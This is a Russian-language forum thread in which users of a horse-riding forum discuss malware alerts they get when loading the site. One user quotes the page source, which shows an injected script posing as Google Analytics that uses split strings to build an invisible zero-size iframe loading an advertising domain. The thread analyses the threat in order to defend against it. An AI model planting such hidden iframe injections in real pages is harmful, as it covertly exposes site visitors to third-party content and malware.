Новый глюк/вирус на проконях?

Простите, боюсь, был неправильно понят.
Я вовсе не о политике сайта (хотя, с вашим замечанием совершенно согласен и тот сайт с которым работаю сам, стараюсь держать в порядке и совместимым с разными браузерами),
я о полной безалаберности самих пользователей в интернете. Более того, вовсе не факт, что вирусы вы собираете именно на проконях. То, что они активизируются при посещении именно проконей, может говорить, например, лишь о том, что прокони - первый сайт, на который вы заходите утром. Разумеется, это тоже не факт, тут надо подробно анализировать как содержимое самого сайта, так и содержимое компьютеров самих жертв, это не совсем моя область...
 
Rovena написал(а):
Lisichka-sestrichka написал(а):
Ну вот, опять словила то же самое...(( Надо что-то делать с этой бякой... Не менять же пароли ежедневно...Причём с оперы вхожу без проблем, а вот фаэрфокс ловит уже второй раз эту гадость!!!
поставьте уже на фаерфокс ад-блок! http://adblockplus.org/
А на айпэд что поставить? ((
 
Писала уже и еще раз напишу.
Не давайте загружаться верхнему баннеру. Вирусня сыплется с него.
Загрузился форум - жмите крестик, чтобы остановить загрузку.
 
ellrisha написал(а):
Rovena написал(а):
Lisichka-sestrichka написал(а):
Ну вот, опять словила то же самое...(( Надо что-то делать с этой бякой... Не менять же пароли ежедневно...Причём с оперы вхожу без проблем, а вот фаэрфокс ловит уже второй раз эту гадость!!!
поставьте уже на фаерфокс ад-блок! http://adblockplus.org/
А на айпэд что поставить? ((
Мне тут сказали, что айпады вирусами не заражаются. Ничего про айпад сказать не могу.
Но вот для андроида адблока нет, так что я с планшета сюда не хожу.
 
На айпэде лезет та же самая фигня, что и на обычном компе. Но если там я ее ад блоком отсекла , то тут никак. И она день ото дня все разнообразнее я смотрю.
И все таки....... а где админы? От них же вообще ни звука не было?
 
Trof написал(а):
Писала уже и еще раз напишу.
Не давайте загружаться верхнему баннеру. Вирусня сыплется с него.
Загрузился форум - жмите крестик, чтобы остановить загрузку.
Trof, вот тут уже говорили, что прям в тексте страницы (в самом конце) у вас стоит блочок, который добавляет фрейм нулевых размеров, в который загружаются разные сайты (там дальше, от меня, есть скрин того сайта, который оно загружало вчера). Вот оттуда всё и сыплется: (это фрагмент кода страницы прям вот этой темы, где мы щяс общяемся)

<!-- Google Analytics -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-1256381-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>

<script type="text/javascript">
var el = document.createElement("ifra"+"me");
document.body.appendChild(el);
el.src = 'ht'+'tp://pa'+'gel.adv'+'tab.ru/?s'+'how&key'+'word=ko';
el.width = '0';el.height = '0';el.frameBorder = '0';
_uacct = "UA-1256381-1";
urchinTracker();
</script>


(зеленым я покрасил код гугл-аналитика, а красным - тот самый блочок, который тоже прикидывается частью аналитика, но на самом деле, создает i-фрейм и загружает в него страницу с адреса hттp://pagel.advtab.ru/?show&keyword=ko , вчера это был "Форум о заработке" (hттp://bxbb.ru/forum.php , кстати, на нем тоже есть вставка от адвтаба), что сегодня - незнаю - надоело кормить сторонние сайты посещаемостью, да и комп у меня далеко не самый защищенный, поэтому у себя на компе просто глобально заблокировал доступ к advtab.ru)

А на крестики (и вообще что бы то ни было) на баннерах я никогда не жму, ибо это уже не банальный "показ", а реальный "клик", за который платят знааачительно больше :wink: (и фиг его знает, к чему этот клик, вообще, приведет)
 
Вообще-то не на крестик на баннере, а на крестик - остановку загрузки страницы.
Я стала ее останавливать не догружая, и ни разу еще антивирусник не ругнулся что что-то поймал. СтОит догрузить страницу - сразу ловит вирус.
Я не знаю по какой причине. Я не программист. Эти вопросы задавайте Диме, мне это рассказывать бесполезно. Я только провела прямую связь. Как только появился баннер наверху - начала сыпаться вирусня.
 
Trof написал(а):
Вообще-то не на крестик на баннере, а на крестик - остановку загрузки страницы.
А! Понял :) (дело в том, что на вашем баннере тоже есть красный крестик в правом верхнем углу, неоднозначность получилась)
Я в таких случаях просто жму эскейп - результат тот же, но не нужно быть снайпером, чтобы попасть мышкой в небольшую кнопку (у меня восьмой эксплорер и там тот крестик - на кнопке) :mrgreen:
, но в данном конкретном (моём) случае, это не тот случай - мой браузер просто висит и ни на что не реагирует, пока не загрузится этот баннер (возможно, сказывается одноядерность моего устаревшего процессора, а может и моя блокировка адвтаба), так что, мне его вообще никак не остановить. Пока я его адрес шутки ради просто заблокировал так же, как и адвтаб, но это не честно - за прокони кто тогда платить будет, яндекс-директ, что ли?
(кстати, заметьте, ни одного внешнего тулбара в браузере :wink: Даже от Яндекса!, хоть он самый пронырливый)

Ладно, пойду разблокирую... неудобно как-то... :oops:
 

Вложения

  • prokoni.jpg
    prokoni.jpg
    130,8 KB · Просмотры: 1.232
такая же хрень выплывает на 3-х компах! Помогает перезагрузка браузера через "диспетчер задач". Причем появляется со стартовой страницы сайта. Когда сразу загружаешь форумы - то все норм!... Сижу через гугл хром или оперу.

a33a0f5fae7a.jpg
[/URL]
 
Сверху